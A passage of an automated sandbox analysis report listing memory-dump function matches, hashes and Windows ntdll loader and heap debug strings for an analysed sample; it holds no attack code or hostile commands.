                                          • Instruction Fuzzy Hash: E351C279208344AFF324CF24D880BAB77E8EF84754F400919F595A7260DA31E955CB92
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                          • API String ID: 3446177414-4227709934
                                          • Opcode ID: 8b920ff79a7f2ca8f2010ff360ff0c7bd4aa9d03854f9a927417abc91941a721
                                          • Instruction ID: 0f0eeb26ce1665b0a482f51cd9e599fea93d3c3e7893dfd6d224283f4c15cb02
                                          • Opcode Fuzzy Hash: 8b920ff79a7f2ca8f2010ff360ff0c7bd4aa9d03854f9a927417abc91941a721
                                          • Instruction Fuzzy Hash: ED416EB990130DABDB01DF9AC980AEEBBB9BF48314F100159ED05A7342D771A951DB90
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                          • API String ID: 3446177414-3492000579
                                          • Opcode ID: 66ff858a842354e344541c294a120eaa746ae9d496342d6a26be69b6e4670839
                                          • Instruction ID: faaacafcb4b72e933c5dbf39001d497294083f25b6bbd26f73a53ab8a228c020
                                          • Opcode Fuzzy Hash: 66ff858a842354e344541c294a120eaa746ae9d496342d6a26be69b6e4670839
                                          • Instruction Fuzzy Hash: F8710079A15285DFEB02CFA8C4406EEFBF6FF4A314F148199E444AB252CF719981CB50
                                          APIs
                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 328F9AC5, 328F9B06
                                          • LdrpLoadShimEngine, xrefs: 328F9ABB, 328F9AFC
                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 328F9AB4
                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 328F9AF6
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-3589223738
                                          • Opcode ID: e7b22ac246b9ab2bfa6771682ba5c7c2001dc804a71e757ff4caaf5f0e6787a6
                                          • Instruction ID: 8c3a774f8ea430e18aecd48320d213373e6a49bc29811ded31077b1bd0cfca44
                                          • Opcode Fuzzy Hash: e7b22ac246b9ab2bfa6771682ba5c7c2001dc804a71e757ff4caaf5f0e6787a6
                                          • Instruction Fuzzy Hash: 3951343AA01368AFEB04CFACCC54BED77A6BB44314F000565E555BB286DBB19C82CB90
                                          APIs
                                          Strings
                                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3294F263
                                          • HEAP: , xrefs: 3294F15D
                                          • ---------------------------------------, xrefs: 3294F279
                                          • Entry Heap Size , xrefs: 3294F26D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                          • API String ID: 3446177414-1102453626
                                          • Opcode ID: 5b8b9f9a99d1a139e274084952052c64d91258d9dbbe114b80f7b6b84bded68e
                                          • Instruction ID: 713e500d5bcda6b493bec3cde8eb61959a28efebb44d77f69e87d13aba36de1b
                                          • Opcode Fuzzy Hash: 5b8b9f9a99d1a139e274084952052c64d91258d9dbbe114b80f7b6b84bded68e
                                          • Instruction Fuzzy Hash: 3541B039A01216DFEB05CF18C880A66BBF9FF493687158569D818AB321DB31EC42CBC0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-$0$0
                                          • API String ID: 1302938615-699404926
                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction ID: dfc3f769ead6e9109968c5ddae42a8f7820a46dbdbd512f307aac02822ba05be
                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction Fuzzy Hash: BB81B2BCE072598FEF048E6CC8527EEBBB1BF47394F54415AD866A7691CB349840CB50
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$@
                                          • API String ID: 3446177414-1194432280
                                          • Opcode ID: 4be9344888061b469cbef2ab75134fb7dce270559af07fd14019292c915a0088
                                          • Instruction ID: fd4692d5626027cf3f4601d19dfaedd5fff648fe5f3910ef6cd04fcabd412f5c
                                          • Opcode Fuzzy Hash: 4be9344888061b469cbef2ab75134fb7dce270559af07fd14019292c915a0088
                                          • Instruction Fuzzy Hash: C7813C75D002699BDB25CF94CC54BEEB7B8AF08754F0085EAE919B7240DB709E85CFA0
                                          APIs
                                          Strings
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3291362F
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 32913640, 3291366C
                                          • LdrpFindDllActivationContext, xrefs: 32913636, 32913662
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 3291365C
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 3446177414-3779518884
                                          • Opcode ID: 0bf20b1f20c5929e582a11a696375a1d2ddb931c4d7185fd15e6b3f847ff44a9
                                          • Instruction ID: 189e73cd600deaf22dfa2fcfd82cc569665ffd488aeee9e57bc82f3efb731155
                                          • Opcode Fuzzy Hash: 0bf20b1f20c5929e582a11a696375a1d2ddb931c4d7185fd15e6b3f847ff44a9
                                          • Instruction Fuzzy Hash: ED31F76E901315AFFB21DB08C844B66F3A4AB067A8F464166E84CE7251DF70BC88C795
                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 3290A9A2
                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3290A992
                                          • LdrpDynamicShimModule, xrefs: 3290A998
                                          • apphelp.dll, xrefs: 328C2462
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-176724104
                                          • Opcode ID: daa12ee0c613d2f1915bc8ecf497d811c2a62ea48d3637df4cd8da545acbb744
                                          • Instruction ID: 14361ea11d30074c8704a7477a8834df778c7a4915e16b8877b36dc4834504c1
                                          • Opcode Fuzzy Hash: daa12ee0c613d2f1915bc8ecf497d811c2a62ea48d3637df4cd8da545acbb744
                                          • Instruction Fuzzy Hash: 58312879A40305EBF7109F6AC940BAAB7B9FF84764F158459EA10B7294CB7098C6CFC0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$[$]:%u
                                          • API String ID: 48624451-2819853543
                                          • Opcode ID: 3b5a98af5ec13852b7f7b186081e8506997a975c565fa5dba2ac726a09ec507b
                                          • Instruction ID: f2dc31bfdbcc0b66c5d8db1a4037efac6248478035bebbcdcddad3ab2cde4dea
                                          • Opcode Fuzzy Hash: 3b5a98af5ec13852b7f7b186081e8506997a975c565fa5dba2ac726a09ec507b
                                          • Instruction Fuzzy Hash: 25215EBAE00119ABDB10DF69DC40AEF7BECAF54784F540126E915E7200EB71DA018BA1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 3446177414-3610490719
                                          • Opcode ID: 5a6294ce7d21eeae540964e1795263c1d73c1b3448fb2663bd95d69f6a93bc90
                                          • Instruction ID: e9efecd26dba0244dafff4377eeae8c401bde6abaeac9396c268797079a48e55
                                          • Opcode Fuzzy Hash: 5a6294ce7d21eeae540964e1795263c1d73c1b3448fb2663bd95d69f6a93bc90
                                          • Instruction Fuzzy Hash: D091107D714740AFE719DF28C880BAAB7E5BF90758F000459F9589B291DFB4A841CB92
                                          APIs
                                          Strings
                                          • LdrpCheckModule, xrefs: 3290A117
                                          • minkernel\ntdll\ldrinit.c, xrefs: 3290A121
                                          • Failed to allocated memory for shimmed module list, xrefs: 3290A10F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-161242083
                                          • Opcode ID: 99d8b5ebccb9401b2ade481b04ca75b743e3e4a2aa8e4f71d14746ea8a475010
                                          • Instruction ID: b3a27f82a9a9154b1b4ff71f06a60d5931a93584324721b94e44eef19d5056bc
                                          • Opcode Fuzzy Hash: 99d8b5ebccb9401b2ade481b04ca75b743e3e4a2aa8e4f71d14746ea8a475010
                                          • Instruction Fuzzy Hash: 1F71CE78A00219DFEB08DF68C980BAEB7F4EF48354F148469D915E7250EB74ED86CB90
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 3446177414-2283098728
                                          • Opcode ID: 99d0b80b5ba07517c319bb405af3add9020d7ce49b367254e981e517fae82b31
                                          • Instruction ID: 16f2c13041f6098820f3efe6a7c3cbe02e40a9aa19046c2edc1d1c6a2ff6181a
                                          • Opcode Fuzzy Hash: 99d0b80b5ba07517c319bb405af3add9020d7ce49b367254e981e517fae82b31
                                          • Instruction Fuzzy Hash: 085106796047219FE718DF28C884B39F791FF84324F0406ADE96997290DB70E846CB91
                                          APIs
                                          Strings
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 329182DE
                                          • minkernel\ntdll\ldrinit.c, xrefs: 329182E8
                                          • Failed to reallocate the system dirs string !, xrefs: 329182D7
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-1783798831
                                          • Opcode ID: a88f3b33073faa8991b75a0d6feb8b71806d571af5ff3a46db951a1a8c374877
                                          • Instruction ID: 204e5403976bc081289b95fa429b5594d4496721b19176f07138cd4d5140f466
                                          • Opcode Fuzzy Hash: a88f3b33073faa8991b75a0d6feb8b71806d571af5ff3a46db951a1a8c374877
                                          • Instruction Fuzzy Hash: DF41F5B9546344ABF710DF69CC84B5B77E8BF48760F00492AF958E3290EB74E845CB91
                                          Strings
                                          • RTL: Re-Waiting, xrefs: 32917BAC
                                          • RTL: Resource at %p, xrefs: 32917B8E
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 32917B7F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 0-871070163
                                          • Opcode ID: 6a0b771ea849306b8775c3e89f1f2b46f71f9f8d3b9e4cf8ac7819300ae7ef29
                                          • Instruction ID: 75f52147c0857ad1b0b59d57ee41f0dcd421f1abcb794d3a58f44470b2a2ff6e
                                          • Opcode Fuzzy Hash: 6a0b771ea849306b8775c3e89f1f2b46f71f9f8d3b9e4cf8ac7819300ae7ef29
                                          • Instruction Fuzzy Hash: 4941D1397057069FE714CE29DC40B5AB7E5EF89720F100A2DF95ADB680DB71E809CB91
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3291728C
                                          Strings
                                          • RTL: Re-Waiting, xrefs: 329172C1
                                          • RTL: Resource at %p, xrefs: 329172A3
                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 32917294
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-605551621
                                          • Opcode ID: acfcdc37a8c09d58b7b7b3841d3e3fa3d7a23a6baa50f52100a24ce145bbcbd0
                                          • Instruction ID: dd7e27e518681e88e17ed88f31c2d3a3712213e7336f39ce76fb846d016b5546
                                          • Opcode Fuzzy Hash: acfcdc37a8c09d58b7b7b3841d3e3fa3d7a23a6baa50f52100a24ce145bbcbd0
                                          • Instruction Fuzzy Hash: 08410F3960030AAFE714CE29CC40B96B7A5FF44764F104A19F954AB240DB71F84ACBD0
                                          APIs
                                          Strings
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32924888
                                          • LdrpCheckRedirection, xrefs: 3292488F
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 32924899
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 3446177414-3154609507
                                          • Opcode ID: 0bcfd5731a60aaa5e726bc731673ed7934e66b091eed6a5fb927e3ef4c6c3a33
                                          • Instruction ID: 175845cf1232c1c792353ea52b06e7e3bc868f1164ed93436e12d52e2b615b3a
                                          • Opcode Fuzzy Hash: 0bcfd5731a60aaa5e726bc731673ed7934e66b091eed6a5fb927e3ef4c6c3a33
                                          • Instruction Fuzzy Hash: 4A41B076A15398CFDB11CE68C840A167BECBF49790F011569EC58A7319DB31D800CBD1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: 5685786f6e6a7daac44b928706b08e91d07ac426f07183923c95a283b91c752c
                                          • Instruction ID: 5bc237eea7d0a91547af8eebdbba281c8a932e2086d4c56c3e1f43240d328a3c
                                          • Opcode Fuzzy Hash: 5685786f6e6a7daac44b928706b08e91d07ac426f07183923c95a283b91c752c
                                          • Instruction Fuzzy Hash: 67314176A00219AFDB14CF29DC40BEE77BCEB44754F944596E849E7240EF31AA498FA0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Wow64 Emulation Layer
                                          • API String ID: 3446177414-921169906
                                          • Opcode ID: c59fd257b729ef2a25caf5d2416f161e8d122df340d037fec95762b95a51bb88
                                          • Instruction ID: 32e5c39f95d95eea03ff2be13bfa72f35c60c1a223a8702009f20353d3f2c6b2
                                          • Opcode Fuzzy Hash: c59fd257b729ef2a25caf5d2416f161e8d122df340d037fec95762b95a51bb88
                                          • Instruction Fuzzy Hash: 44211A7A90025DBFEF01DAA48C88DFF7B7DEF44799B0444A4FA11A2210DA309E059B60
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e971dea09eca88c78e9ee955d73489558b796afb838ae7e0dbf4096f72f6a26
                                          • Instruction ID: 314a8613480560b6da805e4774f117e753ce4c6062d41539f236e5c3f1da7eab
                                          • Opcode Fuzzy Hash: 7e971dea09eca88c78e9ee955d73489558b796afb838ae7e0dbf4096f72f6a26
                                          • Instruction Fuzzy Hash: 30E1FD78D00718CFEB25CFA9C980A9DFBF5BF58314F20452AE959A7228DB70A941CF50
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 10957cee4cfa7fe56d3979710714ab90cfc25c5e83414cc9e3404fc1c6886c41
                                          • Instruction ID: 920884b6507e1d77798bd55d9ef6db0bb3618d5fada18669483e221801cfe8d0
                                          • Opcode Fuzzy Hash: 10957cee4cfa7fe56d3979710714ab90cfc25c5e83414cc9e3404fc1c6886c41
                                          • Instruction Fuzzy Hash: 72712275E0031D9FEF05CFAAC980ADDBBB5BF48354F54402AE905BB255DB34A905CBA0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: c094d5a10b0b30b1dec7df77bdb8fd890b78a878a40f5b9cc781cc2c1f7e1bbd
                                          • Instruction ID: 70142f2fccd3608bdf871d03b95c362fa3d415bc8c04148748355f4047e7a689
                                          • Opcode Fuzzy Hash: c094d5a10b0b30b1dec7df77bdb8fd890b78a878a40f5b9cc781cc2c1f7e1bbd
                                          • Instruction Fuzzy Hash: A2516679701A129FEB18CE5CC8A4A29B7FABF89354F10406DD906DB760DB76EC41CB80
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
